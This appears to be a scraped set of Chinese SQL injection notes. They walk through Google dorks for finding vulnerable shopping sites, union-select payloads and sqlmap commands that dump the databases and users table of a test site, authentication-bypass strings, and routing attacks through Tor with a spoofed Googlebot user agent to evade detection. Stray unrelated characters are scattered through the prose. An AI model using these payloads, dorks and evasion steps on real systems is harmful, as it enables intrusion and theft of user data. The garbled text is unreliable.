參考學(xué)習(xí):http://bbs.pediy.com/thread-218235.htm
Google search:
inurl:"products.php?prodID="
inurl:buy.php?category=
http://testphp.vulnweb.com/listproducts.php?cat=1
http://testphp.vulnweb.com/listproducts.php?cat='
http://testphp.vulnweb.com/listproducts.php?cat=1+order+by+1
http://testphp.vulnweb.com/listproducts.php?cat=1+order+by+6
http://testphp.vulnweb.com/listproducts.php?cat=1+union+select+1,2,3,4,5,6,7,8,9,10,11
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,@@version
有時服務(wù)器不能直接理解@@ version命令请唱,需要轉(zhuǎn)換它晃跺。您將需要使用convert(@@版本使用latin1)或unhex(hex(@@版本))替換@@版本捶闸。
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --time-sec 15
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns
SQL注入攻擊的類型
經(jīng)典SQLI
盲注或推斷SQL注入數(shù)據(jù)庫管理系統(tǒng)
特定的SQLI
復(fù)合SQLI
SQL注入+認(rèn)證不足
SQL注入+ DDoS 攻擊
SQL注入+ DNS劫持
SQL注入+ XSS
錯誤過濾的轉(zhuǎn)義字符
當(dāng)用戶輸入未針對轉(zhuǎn)義字符 進行過濾時,會發(fā)生這種形式的SQL注入 ,然后將其傳遞到SQL語句
statement = "SELECT*FROM users WHERE name ='" + userName + "';"
使用注釋甚至阻止查詢的其余部分(有三種類型的SQL注釋)避除。所有三行最后都有一個空格:
' or '1'='1' --
' or '1'='1' ({
' or '1'='1' /*
http://books.example.com/showReview.php?ID=5 AND substring(@@version,1,1)=4
apt-get instal tor
tor
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=2 --tor --tor-type=SOCKS5
偽裝成Googlebot:
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=2 --tor --tor-type=SOCKS5 --user-agent="Googlebot (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
